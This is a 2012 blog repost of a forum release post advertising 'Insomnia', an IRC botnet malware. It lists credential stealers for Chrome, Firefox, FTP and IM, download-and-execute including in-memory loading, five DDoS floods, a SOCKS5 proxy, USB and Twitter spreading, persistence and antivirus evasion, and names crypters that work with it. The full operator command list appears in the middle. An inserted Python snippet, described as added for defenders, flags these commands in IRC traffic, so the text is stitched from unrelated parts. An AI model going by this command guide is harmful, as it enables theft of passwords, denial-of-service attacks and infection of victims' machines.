Tuesday, 3 July 2012

[GET] Insomnia IRC Bot (v2.5.0) - SSL | SOCKS5 | Chrome/FFox/FTP | USB/Twitter Spread [HWID Cracked] [100% Working]


Insomnia

Coded by: aadster



----------------------------------------------------------------------------------------------------
INSOMNIA v2.5.0 - About the Bot |
----------------------------------------------------------------------------------------------------
INSOMNIA is coded in C# and requires the .NET 2.0 Framework to function properly. It is developed for those who want to target machines running the latest versions of Windows, specifically XP machines with the latest updates up to Vista, Windows 7, and even Windows 8. Because these later versions of Windows are bundled with the .NET Framework (3.5+), you will not need to worry about Insomnia losing functionality or low install rates.

----------------------------------------------------------------------------------------------------
INSOMNIA v2.5.0 - Installation |
----------------------------------------------------------------------------------------------------
Upon execution on the target machine, Insomnia will analyze its environment and decide upon the best form of installation. If the machine is housing AntiVirus Programs with specific heuristic and detection patterns, Insomnia may behave differently compared to machines that do not. If Insomnia manages to obtain Administrative rights on a machine, it will take advantage of it by setting a key in the HKLM, rather than HKCU, along with an automated firewall exception for the SOCKS server.

----------------------------------------------------------------------------------------------------
INSOMNIA v2.5.0 - Core Features |
----------------------------------------------------------------------------------------------------
- GeoIP for country detection with system locale fallback.
- SSL support for IRC connections
- SOCKS5 server with uPnP for a higher success rate and authentication
- Encrypted topic commands with generator (Updating)
- Registry monitor/persistence
- Start Up
- Bot quit messages are specific to the reason the process is ending:
    Windows is going to sleep...
    Windows is shutting down...
    Windows is logging off...
- WMI Query for installed AntiVirus and FireWall Software (Vista/7/8)
- Update with MD5 hash check.
- Download and Execute a .NET file in memory.
- Download and execute a file for X seconds before removing.
- RusKill functionality marks files for deletion upon reboot and tries to reverse any changes that were made by other malware.
- 5 different DDoS methods to initiate distributed denial of service attacks against a wide variety of targets:
    Apache Remote Memory Exhaustion (A.R.M.E.)
    Slowloris
    Layer7
    Layer4
    UDP
- BotKiller that is capable of removing bots such as ngrBot and Aryan that use injected threads in explorer.exe. BotKillers on HF are hardcoded to kill only specific malware, Insomnia on the other hand is coded to watch and detect many different attributes that malware display, making this easily the most effective botkiller on HF.
- FTP Stealer
- IM Stealer
- PW Stealer (Chrome and Firefox)
- Color coding to improve readability.

----------------------------------------------------------------------------------------------------
INSOMNIA v2.5.0 - Complete Command List |
----------------------------------------------------------------------------------------------------
.v Displays information about the bot including current version, location of the file, MD5 hash, and registry installation location (HKCU/HKLM).
.avinfo Vista+. Queries WMI for the current Antivirus and Firewall programs installed on the client.
.chrome [keyword] Outputs data from Chrome SQLite databases, works on latest Chrome too (16.x).
.firefox [keyword] Outputs password data from Mozilla Firefox (latest).
.j #channel Joins a channel.
.p #channel Parts a channel.
.sort Client will join the channels that match the GeoIP/Locale of the system (ex. #US, #RU).
.unsort Reverses the above sort.
.permsort Admins join #admins, users join #users.
.twitter "MSG" Starts twitter spread with the given message. Please make sure your message is encased in quotes so it knows everything to send. More params/options for this coming soon.
.ftp Steals FTP accounts from FileZilla if installed on the target machine. Support for more coming soon.
.bk Starts the standard botkiller module. Capable of removing most common HF malware. This function now removes any version of insomnia under v2.0.0.
.bk -i Capable of removing bots that inject into explorer.exe on 32bit and iexplore.exe on 64bit machines.
.ruskill on/off New global toggle for ruskill, more like a pDef/Ruskill hybrid. Activating Ruskill on download is no longer needed, just toggle this before and leave running to reverse many changes to the client system.
.rc Tells the client to reconnect to IRC after 15 seconds have passed.
.up URL MD5 Updates the binary with the given URL after checking it against the MD5 provided to make sure you are updating to a good file.
.dl URL Download and executes the given URL.
.dl URL ENVVAR Download and executes the given URL after dropping to a specific environment variable (ex. APPDATA, TEMP, etc). Case-insensitive.
.dl URL -t SECS Downloads target URL and waits for the given amount of time before removing the file, if it's still running.
.dl URL -m Downloads the target URL into memory without drops, and uses reflection to execute it. Sometimes if the app you download calls exit code of -1, it can kill the host process (insomnia), as well, however the persistence thread should restart it. This command is only for those who have a good reason to use it.
.rm Ends persistence thread, registry monitor, ruskill, all active DDoS threads, removes registry key, and removes itself.
.m on/off Toggles mute (when on you won't get output from any commands).
.arme URL PORT SECS Starts the Apache Remote Execution DDoS on the target URL. 
.http URL PORT SECS Starts the HTTP (Application Layer 7) DDoS on the target URL.
.tcp URL PORT SECS Starts the TCP (Transport Layer 4) DDoS on the target URL.
.udp URL PORT SECS Starts the UDP packet flood on the target URL.
.slow URL PORT SECS Starts the Slowloris flood on the target URL.
.stop Aborts any active DDoS threads.
.read URL Reads encrypted topic commands from an external URL.
.socks Starts the SOCKS5 server. If you repeat this command again on systems that already have SOCKS server running, it will set a new random password for those connections and output.
.socks user pass Sets a custom user/pass for already active/new SOCKS servers.
.usb on/off Toggles the USB LNK automatic spreader. This will spread to all drives that are currently mounted, as well as monitor and spread to all new drives that are plugged in.
.color <on/off> Toggles IRC color outputs.
.visit URL -h Visits the specified URL without showing the browser.
.visit URL Visits the specified URL in the default browser.
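
For defenders, the command grammar listed above is specific enough to flag cleartext IRC sessions that carry it. The following is an added example, not part of the original post or the bot's code: the sample lines, hosts, channel names, category labels and function names are constructed, and it assumes commands arrive unencrypted as PRIVMSG or TOPIC text (SSL sessions and encrypted topic commands are not visible to it).

```python
import re

# Command names from the list above, grouped by what a responder cares about.
COMMANDS = {
    "dl": "download-execute", "up": "update", "read": "remote-commands",
    "arme": "ddos", "http": "ddos", "tcp": "ddos", "udp": "ddos", "slow": "ddos",
    "chrome": "credential-theft", "firefox": "credential-theft", "ftp": "credential-theft",
    "socks": "proxy", "usb": "spread", "twitter": "spread", "visit": "visit",
    "bk": "botkiller", "ruskill": "botkiller", "rm": "uninstall",
}
# One IRC line: optional ":prefix", PRIVMSG or TOPIC, a target, then the trailing text.
IRC_RE = re.compile(r"^(?::\S+ )?(?:PRIVMSG|TOPIC) \S+ :(?P<text>.*)$")
CMD_RE = re.compile(r"^\.(?P<name>[a-z]+)(?: (?P<args>.*))?$")
DDOS_ARGS = re.compile(r"^\S+ \d{1,5} \d+$")      # URL PORT SECS
UP_ARGS = re.compile(r"^\S+ [0-9a-fA-F]{32}$")    # URL MD5

def classify(line):
    """Return (category, command, args) for a line carrying a listed command, else None."""
    m = IRC_RE.match(line.rstrip("\r\n"))
    c = CMD_RE.match(m.group("text").strip()) if m else None
    if not c or c.group("name") not in COMMANDS:
        return None
    name, args = c.group("name"), (c.group("args") or "").strip()
    category = COMMANDS[name]
    # Noisy names must also match the documented argument shape (cuts false positives).
    shape = DDOS_ARGS if category == "ddos" else UP_ARGS if name == "up" else None
    if shape and not shape.match(args):
        return None
    if name == "dl" and not args:
        return None
    if name == "dl" and args.endswith(" -m"):
        category = "in-memory-execute"     # reflection load, nothing written to disk
    return (category, name, args)

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (not captured traffic); hosts and channels are placeholders.
SAMPLE = [
    ":op!u@host.example PRIVMSG #US :.dl http://files.example/a.exe -m",
    ":op!u@host.example PRIVMSG #users :.up http://files.example/b.exe 0123456789abcdef0123456789abcdef",
    ":op!u@host.example PRIVMSG #users :.udp 192.0.2.10 80 60",
    ":alice!a@host.example PRIVMSG #chat :.http is a protocol",
    ":bob!b@host.example PRIVMSG #chat :hello everyone",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The `-m` variant is reported separately because it leaves no dropped file for disk-based scanning to find, so the network or process-level signal is the one that matters.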

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---
NEW FEATURES in 2.5.0 |
--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---
New commands
- Added .visit URL <-h> to toggle visibility, will open in default browser.
- Added .color <on/off> to toggle IRC color output.
- DDoS commands have been renamed, see more info below.

Improved installation
- Insomnia now checks two new additional pathsets for install and will try each one in order until one is successful.
- Self-melt via MoveFileEx
- Installation executable drops are now intelligently named using a naming algorithm that constructs names from existing files on the system.
- Filesystem and registry permissions used to its advantage [betamonkey].

Improved DDoS Methods
- Layer4 flood has been overhauled for better efficiency and stability. It's now called TCP flood to avoid confusion (.tcp)
- Layer7 flood has been tweaked to hold its power over longer delay periods. It's now called HTTP flood to avoid confusion (.http)
- UDP flood has been tweaked down to improve stability.
- Slowloris has been completely overhauled and effectiveness improved thanks to input on its performance. [Hunter S. Thompson & van1lle]
- ARME flood has been redesigned for efficiency and stability issues have been addressed.

Added a .visit command
-.visit URL -h (hidden)
-.visit URL (opens visible in default browser)

Addressed some important bugs with misc. functionality
- Fixed a bug with SOCKS5 that caused some HTML to be outputted to channel, this was caused by parsing the IP from WipMania API and not properly validating the regex result.
- Fixed compatibility issues with all versions of Fatalz IRCd.
- Fixed proper unicode character output with .firefox/.chrome password stealers.
- Improved USB LNK spread folder/binary hiding.
- Improved Installation fallback path choices.
- Improved Installation drop names (generated from random algorithm based on files in sys32).
- Improved Installation file protection using NTFS permissions.
- TaskManager monitor to hide "Show processes from all users" button. [betamonkey]
- Made an improvement to connection-hangs with irc.
- Minor botkiller improvements.

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-
Other Information|
--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-
SOCKS5 Information
These are direct-connect socks that rely on the uPnP library to automate the port-forwarding process. They can work on many PCs without uPnP as well but it's not as common. I've averaged about 30/40% success rates on the SOCKS5 proxies, gaining about 30/40 proxies for every 100 bots. I'm working on a reverse-proxy application right now which will increase the success rate by far. Updates are free.

IRC Information
This was coded and tested using unrealIRCd 3.2.8.1+ but works on legacy versions. Insomnia conforms to the IRC RFC so any other servers should be fine, aside from a few tweaks that these unreal mods needed. Fatalz is once again working.

SSL is recommended for IRC because all traffic and sent/received data is encrypted. This prevents any sniffing tools or bots from analyzing the traffic. You can make use of unrealircd channel mode: +z to only accept SSL connections. (+Z in the 3.2.9 RC).
- Bin size is ~200kb. This includes everything with the uPnP library for SOCKS5
- A list of Crypters that I have tested and can confirm work with Insomnia - Can Not Vouch If FUD:
DataProtector
Sikandar's crypter
TLTK
PM me to test your Crypter





